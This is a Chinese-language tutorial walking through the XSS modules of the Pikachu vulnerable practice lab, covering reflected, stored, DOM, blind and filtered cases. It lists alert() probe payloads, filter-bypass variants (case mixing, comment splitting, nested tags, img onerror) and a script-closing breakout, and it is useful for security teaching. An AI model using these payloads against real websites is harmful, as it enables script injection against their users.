本篇文章旨在为网络安全渗透测试靶机复现教学。通过阅读本文，读者将能够对渗透pikachu靶场XSS跨站脚本攻击模块有一定的了解

原文学习链接

CSDN博主：One_Blanks

主页地址：https://blog.csdn.net/NPSM_?type=blog

一、靶机资源下载

PHPStudy：

https://www.xp.cn/php-study

pikachu：

https://github.com/zhuifengshaonianhanlu/pikachu

二、反射型XSS（get）

1.1 提交框插入XSS检测代码

# xss口令：见框就插
<script>alert("XSS")</script>

1.2 burp suite抓包并找到传参点

1.3 burp suite改包后发送数据包，查看浏览器执行结果

1.4 方法二：修改前端输入框长度限制

三、反射型XSS（post）

1.1 爆破登录框

username=admin
password=123456

1.2 插入XSS检测代码

<script>alert("XSS")</script>

四、存储型XSS

<script>alert("XSS")</script>

五、DOM型XSS

# DOM型就是将XSS输入到标签属性中了，利用标签属性进行触发
javascript:alert(23)

六、DOM型xss-x

# DOM型就是将XSS输入到标签属性中了，利用属性进行触发
javascript:alert(23)

七、XSS盲打

1.1 插入XSS检测代码

<script>alert("xss")</script> 

1.2 查看提示

1.3 根据提示进入登陆地址

http://192.168.60.181/pikachu/vul/xss/xssblind/admin_login.php
#根据自己靶机IP地址更换下IP

八、xss过滤

1.1 输入框输入XSS检测代码

<script>alert("xss")</script>

1.2 使用其他XSS检测代码尝试

大小写混淆过滤,<scRipt>alert(14)</sCript>
使用注释进行干扰: <sc<!--test--> ript> alert(14)</scr <--test--> ipt>
重写: <scri<script> pt> alert(14)</scri</script> pt>
使用img标签<img src=xss onerror="alert(11)">

九、 xss之htmlspecialchars

1.1 输入框输入XSS检测代码

<script>alert("xss")</script>

1.2 重新构造XSS检测代码

# htmlspecialchars()函数把预定义的字符转换为HTML实体
# &(和号)成为&
# “(双引号)成为”
# ‘(单引号)成为’
# <(小于)成为<
# ‘>’(大于)成为>
javascript:alert("XSS")

十、xss之href输出

javascript:alert("XSS")

十一、xss之js输出

1.1 插入xss检测代码

<script>alert(1)</script>

1.2 重构xss检测语句

</script><script>alert(1)</script>
# 前面多写一个</script>与网站代码中的<script>形成闭合，再去执行我们的<script>alert(xss)</script>